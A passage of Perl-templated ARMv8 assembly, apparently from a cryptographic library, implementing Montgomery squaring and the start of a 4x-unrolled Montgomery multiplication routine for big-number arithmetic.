umulh $t3,$a7,$a6 // hi(a[7]*a[6])
adc $acc5,xzr,xzr // t[13]
adds $acc4,$acc4,$t0
sub $cnt,$ap_end,$ap // done yet?
adc $acc5,$acc5,$t1
adds $acc5,$acc5,$t2
	sub	$t0,$ap_end,$num		// rewound ap
adc $acc6,xzr,xzr // t[14]
add $acc6,$acc6,$t3
cbz $cnt,.Lsqr8x_outer_break
mov $n0,$a0
ldp $a0,$a1,[$tp,#8*0]
ldp $a2,$a3,[$tp,#8*2]
ldp $a4,$a5,[$tp,#8*4]
ldp $a6,$a7,[$tp,#8*6]
adds $acc0,$acc0,$a0
adcs $acc1,$acc1,$a1
ldp $a0,$a1,[$ap,#8*0]
adcs $acc2,$acc2,$a2
adcs $acc3,$acc3,$a3
ldp $a2,$a3,[$ap,#8*2]
adcs $acc4,$acc4,$a4
adcs $acc5,$acc5,$a5
ldp $a4,$a5,[$ap,#8*4]
adcs $acc6,$acc6,$a6
mov $rp,$ap
adcs $acc7,xzr,$a7
ldp $a6,$a7,[$ap,#8*6]
add $ap,$ap,#8*8
//adc $carry,xzr,xzr // moved below
mov $cnt,#-8*8
// a[8]a[0]
// a[9]a[0]
// a[a]a[0]
// a[b]a[0]
// a[c]a[0]
// a[d]a[0]
// a[e]a[0]
// a[f]a[0]
// a[8]a[1]
// a[f]a[1]........................
// a[8]a[2]
// a[f]a[2]........................
// a[8]a[3]
// a[f]a[3]........................
// a[8]a[4]
// a[f]a[4]........................
// a[8]a[5]
// a[f]a[5]........................
// a[8]a[6]
// a[f]a[6]........................
// a[8]a[7]
// a[f]a[7]........................
.Lsqr8x_mul:
mul $t0,$a0,$n0
adc $carry,xzr,xzr // carry bit, modulo-scheduled
mul $t1,$a1,$n0
add $cnt,$cnt,#8
mul $t2,$a2,$n0
mul $t3,$a3,$n0
adds $acc0,$acc0,$t0
mul $t0,$a4,$n0
adcs $acc1,$acc1,$t1
mul $t1,$a5,$n0
adcs $acc2,$acc2,$t2
mul $t2,$a6,$n0
adcs $acc3,$acc3,$t3
mul $t3,$a7,$n0
adcs $acc4,$acc4,$t0
umulh $t0,$a0,$n0
adcs $acc5,$acc5,$t1
umulh $t1,$a1,$n0
adcs $acc6,$acc6,$t2
umulh $t2,$a2,$n0
adcs $acc7,$acc7,$t3
umulh $t3,$a3,$n0
adc $carry,$carry,xzr
str $acc0,[$tp],#8
adds $acc0,$acc1,$t0
umulh $t0,$a4,$n0
adcs $acc1,$acc2,$t1
umulh $t1,$a5,$n0
adcs $acc2,$acc3,$t2
umulh $t2,$a6,$n0
adcs $acc3,$acc4,$t3
umulh $t3,$a7,$n0
ldr $n0,[$rp,$cnt]
adcs $acc4,$acc5,$t0
adcs $acc5,$acc6,$t1
adcs $acc6,$acc7,$t2
adcs $acc7,$carry,$t3
//adc $carry,xzr,xzr // moved above
cbnz $cnt,.Lsqr8x_mul
// note that carry flag is guaranteed
// to be zero at this point
cmp $ap,$ap_end // done yet?
b.eq .Lsqr8x_break
ldp $a0,$a1,[$tp,#8*0]
ldp $a2,$a3,[$tp,#8*2]
ldp $a4,$a5,[$tp,#8*4]
ldp $a6,$a7,[$tp,#8*6]
adds $acc0,$acc0,$a0
ldur $n0,[$rp,#-8*8]
adcs $acc1,$acc1,$a1
ldp $a0,$a1,[$ap,#8*0]
adcs $acc2,$acc2,$a2
adcs $acc3,$acc3,$a3
ldp $a2,$a3,[$ap,#8*2]
adcs $acc4,$acc4,$a4
adcs $acc5,$acc5,$a5
ldp $a4,$a5,[$ap,#8*4]
adcs $acc6,$acc6,$a6
mov $cnt,#-8*8
adcs $acc7,$acc7,$a7
ldp $a6,$a7,[$ap,#8*6]
add $ap,$ap,#8*8
//adc $carry,xzr,xzr // moved above
b .Lsqr8x_mul
.align 4
.Lsqr8x_break:
ldp $a0,$a1,[$rp,#8*0]
add $ap,$rp,#8*8
ldp $a2,$a3,[$rp,#8*2]
sub $t0,$ap_end,$ap // is it last iteration?
ldp $a4,$a5,[$rp,#8*4]
sub $t1,$tp,$t0
ldp $a6,$a7,[$rp,#8*6]
cbz $t0,.Lsqr8x_outer_loop
stp $acc0,$acc1,[$tp,#8*0]
ldp $acc0,$acc1,[$t1,#8*0]
stp $acc2,$acc3,[$tp,#8*2]
ldp $acc2,$acc3,[$t1,#8*2]
stp $acc4,$acc5,[$tp,#8*4]
ldp $acc4,$acc5,[$t1,#8*4]
stp $acc6,$acc7,[$tp,#8*6]
mov $tp,$t1
ldp $acc6,$acc7,[$t1,#8*6]
b .Lsqr8x_outer_loop
.align 4
.Lsqr8x_outer_break:
// Now multiply above result by 2 and add a[n-1]*a[n-1]|...|a[0]*a[0]
ldp $a1,$a3,[$t0,#8*0] // recall that $t0 is &a[0]
ldp $t1,$t2,[sp,#8*1]
ldp $a5,$a7,[$t0,#8*2]
add $ap,$t0,#8*4
ldp $t3,$t0,[sp,#8*3]
stp $acc0,$acc1,[$tp,#8*0]
mul $acc0,$a1,$a1
stp $acc2,$acc3,[$tp,#8*2]
umulh $a1,$a1,$a1
stp $acc4,$acc5,[$tp,#8*4]
mul $a2,$a3,$a3
stp $acc6,$acc7,[$tp,#8*6]
mov $tp,sp
umulh $a3,$a3,$a3
adds $acc1,$a1,$t1,lsl#1
extr $t1,$t2,$t1,#63
sub $cnt,$num,#8*4
.Lsqr4x_shift_n_add:
adcs $acc2,$a2,$t1
extr $t2,$t3,$t2,#63
sub $cnt,$cnt,#8*4
adcs $acc3,$a3,$t2
ldp $t1,$t2,[$tp,#8*5]
mul $a4,$a5,$a5
ldp $a1,$a3,[$ap],#8*2
umulh $a5,$a5,$a5
mul $a6,$a7,$a7
umulh $a7,$a7,$a7
extr $t3,$t0,$t3,#63
stp $acc0,$acc1,[$tp,#8*0]
adcs $acc4,$a4,$t3
extr $t0,$t1,$t0,#63
stp $acc2,$acc3,[$tp,#8*2]
adcs $acc5,$a5,$t0
ldp $t3,$t0,[$tp,#8*7]
extr $t1,$t2,$t1,#63
adcs $acc6,$a6,$t1
extr $t2,$t3,$t2,#63
adcs $acc7,$a7,$t2
ldp $t1,$t2,[$tp,#8*9]
mul $a0,$a1,$a1
ldp $a5,$a7,[$ap],#8*2
umulh $a1,$a1,$a1
mul $a2,$a3,$a3
umulh $a3,$a3,$a3
stp $acc4,$acc5,[$tp,#8*4]
extr $t3,$t0,$t3,#63
stp $acc6,$acc7,[$tp,#8*6]
add $tp,$tp,#8*8
adcs $acc0,$a0,$t3
extr $t0,$t1,$t0,#63
adcs $acc1,$a1,$t0
ldp $t3,$t0,[$tp,#8*3]
extr $t1,$t2,$t1,#63
cbnz $cnt,.Lsqr4x_shift_n_add
___
my ($np,$np_end)=($ap,$ap_end);
$code.=<<___;
ldp $np,$n0,[x29,#104] // pull np and n0
adcs $acc2,$a2,$t1
extr $t2,$t3,$t2,#63
adcs $acc3,$a3,$t2
ldp $t1,$t2,[$tp,#8*5]
mul $a4,$a5,$a5
umulh $a5,$a5,$a5
stp $acc0,$acc1,[$tp,#8*0]
mul $a6,$a7,$a7
umulh $a7,$a7,$a7
stp $acc2,$acc3,[$tp,#8*2]
extr $t3,$t0,$t3,#63
adcs $acc4,$a4,$t3
extr $t0,$t1,$t0,#63
ldp $acc0,$acc1,[sp,#8*0]
adcs $acc5,$a5,$t0
extr $t1,$t2,$t1,#63
ldp $a0,$a1,[$np,#8*0]
adcs $acc6,$a6,$t1
extr $t2,xzr,$t2,#63
ldp $a2,$a3,[$np,#8*2]
adc $acc7,$a7,$t2
ldp $a4,$a5,[$np,#8*4]
// Reduce by 512 bits per iteration
mul $na0,$n0,$acc0 // t[0]*n0
ldp $a6,$a7,[$np,#8*6]
add $np_end,$np,$num
ldp $acc2,$acc3,[sp,#8*2]
stp $acc4,$acc5,[$tp,#8*4]
ldp $acc4,$acc5,[sp,#8*4]
stp $acc6,$acc7,[$tp,#8*6]
ldp $acc6,$acc7,[sp,#8*6]
add $np,$np,#8*8
mov $topmost,xzr // initial top-most carry
mov $tp,sp
mov $cnt,#8
.Lsqr8x_reduction:
// (*) mul $t0,$a0,$na0 // lo(n[0-7])*lo(t[0]*n0)
mul $t1,$a1,$na0
sub $cnt,$cnt,#1
mul $t2,$a2,$na0
str $na0,[$tp],#8 // put aside t[0]*n0 for tail processing
mul $t3,$a3,$na0
// (*) adds xzr,$acc0,$t0
subs xzr,$acc0,#1 // (*)
mul $t0,$a4,$na0
adcs $acc0,$acc1,$t1
mul $t1,$a5,$na0
adcs $acc1,$acc2,$t2
mul $t2,$a6,$na0
adcs $acc2,$acc3,$t3
mul $t3,$a7,$na0
adcs $acc3,$acc4,$t0
umulh $t0,$a0,$na0 // hi(n[0-7])*lo(t[0]*n0)
adcs $acc4,$acc5,$t1
umulh $t1,$a1,$na0
adcs $acc5,$acc6,$t2
umulh $t2,$a2,$na0
adcs $acc6,$acc7,$t3
umulh $t3,$a3,$na0
adc $acc7,xzr,xzr
adds $acc0,$acc0,$t0
umulh $t0,$a4,$na0
adcs $acc1,$acc1,$t1
umulh $t1,$a5,$na0
adcs $acc2,$acc2,$t2
umulh $t2,$a6,$na0
adcs $acc3,$acc3,$t3
umulh $t3,$a7,$na0
mul $na0,$n0,$acc0 // next t[0]*n0
adcs $acc4,$acc4,$t0
adcs $acc5,$acc5,$t1
adcs $acc6,$acc6,$t2
adc $acc7,$acc7,$t3
cbnz $cnt,.Lsqr8x_reduction
ldp $t0,$t1,[$tp,#8*0]
ldp $t2,$t3,[$tp,#8*2]
mov $rp,$tp
sub $cnt,$np_end,$np // done yet?
adds $acc0,$acc0,$t0
adcs $acc1,$acc1,$t1
ldp $t0,$t1,[$tp,#8*4]
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
ldp $t2,$t3,[$tp,#8*6]
adcs $acc4,$acc4,$t0
adcs $acc5,$acc5,$t1
adcs $acc6,$acc6,$t2
adcs $acc7,$acc7,$t3
//adc $carry,xzr,xzr // moved below
cbz $cnt,.Lsqr8x8_post_condition
ldur $n0,[$tp,#-8*8]
ldp $a0,$a1,[$np,#8*0]
ldp $a2,$a3,[$np,#8*2]
ldp $a4,$a5,[$np,#8*4]
mov $cnt,#-8*8
ldp $a6,$a7,[$np,#8*6]
add $np,$np,#8*8
.Lsqr8x_tail:
mul $t0,$a0,$n0
adc $carry,xzr,xzr // carry bit, modulo-scheduled
mul $t1,$a1,$n0
add $cnt,$cnt,#8
mul $t2,$a2,$n0
mul $t3,$a3,$n0
adds $acc0,$acc0,$t0
mul $t0,$a4,$n0
adcs $acc1,$acc1,$t1
mul $t1,$a5,$n0
adcs $acc2,$acc2,$t2
mul $t2,$a6,$n0
adcs $acc3,$acc3,$t3
mul $t3,$a7,$n0
adcs $acc4,$acc4,$t0
umulh $t0,$a0,$n0
adcs $acc5,$acc5,$t1
umulh $t1,$a1,$n0
adcs $acc6,$acc6,$t2
umulh $t2,$a2,$n0
adcs $acc7,$acc7,$t3
umulh $t3,$a3,$n0
adc $carry,$carry,xzr
str $acc0,[$tp],#8
adds $acc0,$acc1,$t0
umulh $t0,$a4,$n0
adcs $acc1,$acc2,$t1
umulh $t1,$a5,$n0
adcs $acc2,$acc3,$t2
umulh $t2,$a6,$n0
adcs $acc3,$acc4,$t3
umulh $t3,$a7,$n0
ldr $n0,[$rp,$cnt]
adcs $acc4,$acc5,$t0
adcs $acc5,$acc6,$t1
adcs $acc6,$acc7,$t2
adcs $acc7,$carry,$t3
//adc $carry,xzr,xzr // moved above
cbnz $cnt,.Lsqr8x_tail
// note that carry flag is guaranteed
// to be zero at this point
ldp $a0,$a1,[$tp,#8*0]
sub $cnt,$np_end,$np // done yet?
	sub	$t2,$np_end,$num	// rewound np
ldp $a2,$a3,[$tp,#8*2]
ldp $a4,$a5,[$tp,#8*4]
ldp $a6,$a7,[$tp,#8*6]
cbz $cnt,.Lsqr8x_tail_break
ldur $n0,[$rp,#-8*8]
adds $acc0,$acc0,$a0
adcs $acc1,$acc1,$a1
ldp $a0,$a1,[$np,#8*0]
adcs $acc2,$acc2,$a2
adcs $acc3,$acc3,$a3
ldp $a2,$a3,[$np,#8*2]
adcs $acc4,$acc4,$a4
adcs $acc5,$acc5,$a5
ldp $a4,$a5,[$np,#8*4]
adcs $acc6,$acc6,$a6
mov $cnt,#-8*8
adcs $acc7,$acc7,$a7
ldp $a6,$a7,[$np,#8*6]
add $np,$np,#8*8
//adc $carry,xzr,xzr // moved above
b .Lsqr8x_tail
.align 4
.Lsqr8x_tail_break:
ldr $n0,[x29,#112] // pull n0
add $cnt,$tp,#8*8 // end of current t[num] window
subs xzr,$topmost,#1 // "move" top-most carry to carry bit
adcs $t0,$acc0,$a0
adcs $t1,$acc1,$a1
ldp $acc0,$acc1,[$rp,#8*0]
adcs $acc2,$acc2,$a2
ldp $a0,$a1,[$t2,#8*0] // recall that $t2 is &n[0]
adcs $acc3,$acc3,$a3
ldp $a2,$a3,[$t2,#8*2]
adcs $acc4,$acc4,$a4
adcs $acc5,$acc5,$a5
ldp $a4,$a5,[$t2,#8*4]
adcs $acc6,$acc6,$a6
adcs $acc7,$acc7,$a7
ldp $a6,$a7,[$t2,#8*6]
add $np,$t2,#8*8
adc $topmost,xzr,xzr // top-most carry
mul $na0,$n0,$acc0
stp $t0,$t1,[$tp,#8*0]
stp $acc2,$acc3,[$tp,#8*2]
ldp $acc2,$acc3,[$rp,#8*2]
stp $acc4,$acc5,[$tp,#8*4]
ldp $acc4,$acc5,[$rp,#8*4]
cmp $cnt,x29 // did we hit the bottom?
stp $acc6,$acc7,[$tp,#8*6]
mov $tp,$rp // slide the window
ldp $acc6,$acc7,[$rp,#8*6]
mov $cnt,#8
b.ne .Lsqr8x_reduction
// Final step. We see if result is larger than modulus, and
// if it is, subtract the modulus. But comparison implies
// subtraction. So we subtract modulus, see if it borrowed,
// and conditionally copy original value.
ldr $rp,[x29,#96] // pull rp
add $tp,$tp,#8*8
subs $t0,$acc0,$a0
sbcs $t1,$acc1,$a1
sub $cnt,$num,#8*8
mov $ap_end,$rp // $rp copy
.Lsqr8x_sub:
sbcs $t2,$acc2,$a2
ldp $a0,$a1,[$np,#8*0]
sbcs $t3,$acc3,$a3
stp $t0,$t1,[$rp,#8*0]
sbcs $t0,$acc4,$a4
ldp $a2,$a3,[$np,#8*2]
sbcs $t1,$acc5,$a5
stp $t2,$t3,[$rp,#8*2]
sbcs $t2,$acc6,$a6
ldp $a4,$a5,[$np,#8*4]
sbcs $t3,$acc7,$a7
ldp $a6,$a7,[$np,#8*6]
add $np,$np,#8*8
ldp $acc0,$acc1,[$tp,#8*0]
sub $cnt,$cnt,#8*8
ldp $acc2,$acc3,[$tp,#8*2]
ldp $acc4,$acc5,[$tp,#8*4]
ldp $acc6,$acc7,[$tp,#8*6]
add $tp,$tp,#8*8
stp $t0,$t1,[$rp,#8*4]
sbcs $t0,$acc0,$a0
stp $t2,$t3,[$rp,#8*6]
add $rp,$rp,#8*8
sbcs $t1,$acc1,$a1
cbnz $cnt,.Lsqr8x_sub
sbcs $t2,$acc2,$a2
mov $tp,sp
add $ap,sp,$num
ldp $a0,$a1,[$ap_end,#8*0]
sbcs $t3,$acc3,$a3
stp $t0,$t1,[$rp,#8*0]
sbcs $t0,$acc4,$a4
ldp $a2,$a3,[$ap_end,#8*2]
sbcs $t1,$acc5,$a5
stp $t2,$t3,[$rp,#8*2]
sbcs $t2,$acc6,$a6
ldp $acc0,$acc1,[$ap,#8*0]
sbcs $t3,$acc7,$a7
ldp $acc2,$acc3,[$ap,#8*2]
sbcs xzr,$topmost,xzr // did it borrow?
ldr x30,[x29,#8] // pull return address
stp $t0,$t1,[$rp,#8*4]
stp $t2,$t3,[$rp,#8*6]
sub $cnt,$num,#8*4
.Lsqr4x_cond_copy:
sub $cnt,$cnt,#8*4
csel $t0,$acc0,$a0,lo
stp xzr,xzr,[$tp,#8*0]
csel $t1,$acc1,$a1,lo
ldp $a0,$a1,[$ap_end,#8*4]
ldp $acc0,$acc1,[$ap,#8*4]
csel $t2,$acc2,$a2,lo
stp xzr,xzr,[$tp,#8*2]
add $tp,$tp,#8*4
csel $t3,$acc3,$a3,lo
ldp $a2,$a3,[$ap_end,#8*6]
ldp $acc2,$acc3,[$ap,#8*6]
add $ap,$ap,#8*4
stp $t0,$t1,[$ap_end,#8*0]
stp $t2,$t3,[$ap_end,#8*2]
add $ap_end,$ap_end,#8*4
stp xzr,xzr,[$ap,#8*0]
stp xzr,xzr,[$ap,#8*2]
cbnz $cnt,.Lsqr4x_cond_copy
csel $t0,$acc0,$a0,lo
stp xzr,xzr,[$tp,#8*0]
csel $t1,$acc1,$a1,lo
stp xzr,xzr,[$tp,#8*2]
csel $t2,$acc2,$a2,lo
csel $t3,$acc3,$a3,lo
stp $t0,$t1,[$ap_end,#8*0]
stp $t2,$t3,[$ap_end,#8*2]
b .Lsqr8x_done
.align 4
.Lsqr8x8_post_condition:
adc $carry,xzr,xzr
ldr x30,[x29,#8] // pull return address
// $acc0-7,$carry hold result, $a0-7 hold modulus
subs $a0,$acc0,$a0
ldr $ap,[x29,#96] // pull rp
sbcs $a1,$acc1,$a1
stp xzr,xzr,[sp,#8*0]
sbcs $a2,$acc2,$a2
stp xzr,xzr,[sp,#8*2]
sbcs $a3,$acc3,$a3
stp xzr,xzr,[sp,#8*4]
sbcs $a4,$acc4,$a4
stp xzr,xzr,[sp,#8*6]
sbcs $a5,$acc5,$a5
stp xzr,xzr,[sp,#8*8]
sbcs $a6,$acc6,$a6
stp xzr,xzr,[sp,#8*10]
sbcs $a7,$acc7,$a7
stp xzr,xzr,[sp,#8*12]
sbcs $carry,$carry,xzr // did it borrow?
stp xzr,xzr,[sp,#8*14]
// $a0-7 hold result-modulus
csel $a0,$acc0,$a0,lo
csel $a1,$acc1,$a1,lo
csel $a2,$acc2,$a2,lo
csel $a3,$acc3,$a3,lo
stp $a0,$a1,[$ap,#8*0]
csel $a4,$acc4,$a4,lo
csel $a5,$acc5,$a5,lo
stp $a2,$a3,[$ap,#8*2]
csel $a6,$acc6,$a6,lo
csel $a7,$acc7,$a7,lo
stp $a4,$a5,[$ap,#8*4]
stp $a6,$a7,[$ap,#8*6]
.Lsqr8x_done:
ldp x19,x20,[x29,#16]
mov sp,x29
ldp x21,x22,[x29,#32]
mov x0,#1
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldr x29,[sp],#128
.inst 0xd50323bf // autiasp
ret
.size __bn_sqr8x_mont,.-__bn_sqr8x_mont
___
}
{
########################################################################
# Even though this might look like an ARMv8 adaptation of mulx4x_mont from
# the x86_64-mont5 module, it's different in the sense that it performs
# reduction 256 bits at a time.
my ($a0,$a1,$a2,$a3,
$t0,$t1,$t2,$t3,
$m0,$m1,$m2,$m3,
$acc0,$acc1,$acc2,$acc3,$acc4,
$bi,$mi,$tp,$ap_end,$cnt) = map("x$_",(6..17,19..28));
my $bp_end=$rp;
my ($carry,$topmost) = ($rp,"x30");
$code.=<<___;
.type __bn_mul4x_mont,%function
.align 5
__bn_mul4x_mont:
.inst 0xd503233f // paciasp
stp x29,x30,[sp,#-128]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
stp x27,x28,[sp,#80]
sub $tp,sp,$num,lsl#3
lsl $num,$num,#3
ldr $n0,[$n0] // *n0
sub sp,$tp,#8*4 // alloca
add $t0,$bp,$num
add $ap_end,$ap,$num
stp $rp,$t0,[x29,#96] // offload rp and &b[num]
ldr $bi,[$bp,#8*0] // b[0]
ldp $a0,$a1,[$ap,#8*0] // a[0..3]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
mov $acc0,xzr
mov $acc1,xzr
mov $acc2,xzr
mov $acc3,xzr
ldp $m0,$m1,[$np,#8*0] // n[0..3]
ldp $m2,$m3,[$np,#8*2]
adds $np,$np,#8*4 // clear carry bit
mov $carry,xzr
mov $cnt,#0
mov $tp,sp
.Loop_mul4x_1st_reduction:
mul $t0,$a0,$bi // lo(a[0..3]*b[0])
adc $carry,$carry,xzr // modulo-scheduled
mul $t1,$a1,$bi
add $cnt,$cnt,#8
mul $t2,$a2,$bi
and $cnt,$cnt,#31
mul $t3,$a3,$bi
adds $acc0,$acc0,$t0
umulh $t0,$a0,$bi // hi(a[0..3]*b[0])
adcs $acc1,$acc1,$t1
mul $mi,$acc0,$n0 // t[0]*n0
adcs $acc2,$acc2,$t2
umulh $t1,$a1,$bi
adcs $acc3,$acc3,$t3
umulh $t2,$a2,$bi
adc $acc4,xzr,xzr
umulh $t3,$a3,$bi
ldr $bi,[$bp,$cnt] // next b[i] (or b[0])
adds $acc1,$acc1,$t0
// (*) mul $t0,$m0,$mi // lo(n[0..3]*t[0]*n0)
str $mi,[$tp],#8 // put aside t[0]*n0 for tail processing
adcs $acc2,$acc2,$t1
mul $t1,$m1,$mi
adcs $acc3,$acc3,$t2
mul $t2,$m2,$mi
adc $acc4,$acc4,$t3 // can't overflow
mul $t3,$m3,$mi
// (*) adds xzr,$acc0,$t0
subs xzr,$acc0,#1 // (*)
umulh $t0,$m0,$mi // hi(n[0..3]*t[0]*n0)
adcs $acc0,$acc1,$t1
umulh $t1,$m1,$mi
adcs $acc1,$acc2,$t2
umulh $t2,$m2,$mi
adcs $acc2,$acc3,$t3
umulh $t3,$m3,$mi
adcs $acc3,$acc4,$carry
adc $carry,xzr,xzr
adds $acc0,$acc0,$t0
sub $t0,$ap_end,$ap
adcs $acc1,$acc1,$t1
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
//adc $carry,$carry,xzr
cbnz $cnt,.Loop_mul4x_1st_reduction
cbz $t0,.Lmul4x4_post_condition
ldp $a0,$a1,[$ap,#8*0] // a[4..7]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
ldr $mi,[sp] // a[0]*n0
ldp $m0,$m1,[$np,#8*0] // n[4..7]
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
.Loop_mul4x_1st_tail:
mul $t0,$a0,$bi // lo(a[4..7]*b[i])
adc $carry,$carry,xzr // modulo-scheduled
mul $t1,$a1,$bi
add $cnt,$cnt,#8
mul $t2,$a2,$bi
and $cnt,$cnt,#31
mul $t3,$a3,$bi
adds $acc0,$acc0,$t0
umulh $t0,$a0,$bi // hi(a[4..7]*b[i])
adcs $acc1,$acc1,$t1
umulh $t1,$a1,$bi
adcs $acc2,$acc2,$t2
umulh $t2,$a2,$bi
adcs $acc3,$acc3,$t3
umulh $t3,$a3,$bi
adc $acc4,xzr,xzr
ldr $bi,[$bp,$cnt] // next b[i] (or b[0])
adds $acc1,$acc1,$t0
mul $t0,$m0,$mi // lo(n[4..7]*a[0]*n0)
adcs $acc2,$acc2,$t1
mul $t1,$m1,$mi
adcs $acc3,$acc3,$t2
mul $t2,$m2,$mi
adc $acc4,$acc4,$t3 // can't overflow
mul $t3,$m3,$mi
adds $acc0,$acc0,$t0
umulh $t0,$m0,$mi // hi(n[4..7]*a[0]*n0)
adcs $acc1,$acc1,$t1
umulh $t1,$m1,$mi
adcs $acc2,$acc2,$t2
umulh $t2,$m2,$mi
adcs $acc3,$acc3,$t3
adcs $acc4,$acc4,$carry
umulh $t3,$m3,$mi
adc $carry,xzr,xzr
ldr $mi,[sp,$cnt] // next t[0]*n0
str $acc0,[$tp],#8 // result!!!
adds $acc0,$acc1,$t0
sub $t0,$ap_end,$ap // done yet?
adcs $acc1,$acc2,$t1
adcs $acc2,$acc3,$t2
adcs $acc3,$acc4,$t3
//adc $carry,$carry,xzr
cbnz $cnt,.Loop_mul4x_1st_tail
	sub	$t1,$ap_end,$num		// rewound $ap
cbz $t0,.Lmul4x_proceed
ldp $a0,$a1,[$ap,#8*0]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
ldp $m0,$m1,[$np,#8*0]
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
b .Loop_mul4x_1st_tail
.align 5
.Lmul4x_proceed:
ldr $bi,[$bp,#8*4]! // *++b
adc $topmost,$carry,xzr
ldp $a0,$a1,[$t1,#8*0] // a[0..3]
sub $np,$np,$num // rewind np
ldp $a2,$a3,[$t1,#8*2]
add $ap,$t1,#8*4
stp $acc0,$acc1,[$tp,#8*0] // result!!!
ldp $acc0,$acc1,[sp,#8*4] // t[0..3]
stp $acc2,$acc3,[$tp,#8*2] // result!!!
ldp $acc2,$acc3,[sp,#8*6]
ldp $m0,$m1,[$np,#8*0] // n[0..3]
mov $tp,sp
ldp $m2,$m3,[$np,#8*2]
adds $np,$np,#8*4 // clear carry bit
mov $carry,xzr
.align 4
.Loop_mul4x_reduction:
mul $t0,$a0,$bi // lo(a[0..3]*b[4])
adc $carry,$carry,xzr // modulo-scheduled
mul $t1,$a1,$bi
add $cnt,$cnt,#8
mul $t2,$a2,$bi
and $cnt,$cnt,#31
mul $t3,$a3,$bi
adds $acc0,$acc0,$t0
umulh $t0,$a0,$bi // hi(a[0..3]*b[4])
adcs $acc1,$acc1,$t1
mul $mi,$acc0,$n0 // t[0]*n0
adcs $acc2,$acc2,$t2
umulh $t1,$a1,$bi
adcs $acc3,$acc3,$t3
umulh $t2,$a2,$bi
adc $acc4,xzr,xzr
umulh $t3,$a3,$bi
ldr $bi,[$bp,$cnt] // next b[i]
adds $acc1,$acc1,$t0
// (*) mul $t0,$m0,$mi
str $mi,[$tp],#8 // put aside t[0]*n0 for tail processing
adcs $acc2,$acc2,$t1
mul $t1,$m1,$mi // lo(n[0..3]*t[0]*n0
adcs $acc3,$acc3,$t2
mul $t2,$m2,$mi
adc $acc4,$acc4,$t3 // can't overflow
mul $t3,$m3,$mi
// (*) adds xzr,$acc0,$t0
subs xzr,$acc0,#1 // (*)
umulh $t0,$m0,$mi // hi(n[0..3]*t[0]*n0
adcs $acc0,$acc1,$t1
umulh $t1,$m1,$mi
adcs $acc1,$acc2,$t2
umulh $t2,$m2,$mi
adcs $acc2,$acc3,$t3
umulh $t3,$m3,$mi
adcs $acc3,$acc4,$carry
adc $carry,xzr,xzr
adds $acc0,$acc0,$t0
adcs $acc1,$acc1,$t1
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
//adc $carry,$carry,xzr
cbnz $cnt,.Loop_mul4x_reduction
adc $carry,$carry,xzr
ldp $t0,$t1,[$tp,#8*4] // t[4..7]
ldp $t2,$t3,[$tp,#8*6]
ldp $a0,$a1,[$ap,#8*0] // a[4..7]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
adds $acc0,$acc0,$t0
adcs $acc1,$acc1,$t1
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
//adc $carry,$carry,xzr
ldr $mi,[sp] // t[0]*n0
ldp $m0,$m1,[$np,#8*0] // n[4..7]
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
.align 4
.Loop_mul4x_tail:
mul $t0,$a0,$bi // lo(a[4..7]*b[4])
adc $carry,$carry,xzr // modulo-scheduled
mul $t1,$a1,$bi
add $cnt,$cnt,#8
mul $t2,$a2,$bi
and $cnt,$cnt,#31
mul $t3,$a3,$bi
adds $acc0,$acc0,$t0
umulh $t0,$a0,$bi // hi(a[4..7]*b[4])
adcs $acc1,$acc1,$t1
umulh $t1,$a1,$bi
adcs $acc2,$acc2,$t2
umulh $t2,$a2,$bi
adcs $acc3,$acc3,$t3
umulh $t3,$a3,$bi
adc $acc4,xzr,xzr
ldr $bi,[$bp,$cnt] // next b[i]
adds $acc1,$acc1,$t0
mul $t0,$m0,$mi // lo(n[4..7]*t[0]*n0)
adcs $acc2,$acc2,$t1
mul $t1,$m1,$mi
adcs $acc3,$acc3,$t2
mul $t2,$m2,$mi
adc $acc4,$acc4,$t3 // can't overflow
mul $t3,$m3,$mi
adds $acc0,$acc0,$t0
umulh $t0,$m0,$mi // hi(n[4..7]*t[0]*n0)
adcs $acc1,$acc1,$t1
umulh $t1,$m1,$mi
adcs $acc2,$acc2,$t2
umulh $t2,$m2,$mi
adcs $acc3,$acc3,$t3
umulh $t3,$m3,$mi
adcs $acc4,$acc4,$carry
ldr $mi,[sp,$cnt] // next a[0]*n0
adc $carry,xzr,xzr
str $acc0,[$tp],#8 // result!!!
adds $acc0,$acc1,$t0
sub $t0,$ap_end,$ap // done yet?
adcs $acc1,$acc2,$t1
adcs $acc2,$acc3,$t2
adcs $acc3,$acc4,$t3
//adc $carry,$carry,xzr
cbnz $cnt,.Loop_mul4x_tail
	sub	$t1,$np,$num			// rewound np?
adc $carry,$carry,xzr
cbz $t0,.Loop_mul4x_break
ldp $t0,$t1,[$tp,#8*4]
ldp $t2,$t3,[$tp,#8*6]
ldp $a0,$a1,[$ap,#8*0]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
adds $acc0,$acc0,$t0
adcs $acc1,$acc1,$t1
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
//adc $carry,$carry,xzr
ldp $m0,$m1,[$np,#8*0]
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
b .Loop_mul4x_tail
.align 4
.Loop_mul4x_break:
ldp $t2,$t3,[x29,#96] // pull rp and &b[num]
adds $acc0,$acc0,$topmost
add $bp,$bp,#8*4 // bp++
adcs $acc1,$acc1,xzr
sub $ap,$ap,$num // rewind ap
adcs $acc2,$acc2,xzr
stp $acc0,$acc1,[$tp,#8*0] // result!!!
adcs $acc3,$acc3,xzr
ldp $acc0,$acc1,[sp,#8*4] // t[0..3]
adc $topmost,$carry,xzr
stp $acc2,$acc3,[$tp,#8*2] // result!!!
cmp $bp,$t3 // done yet?
ldp $acc2,$acc3,[sp,#8*6]
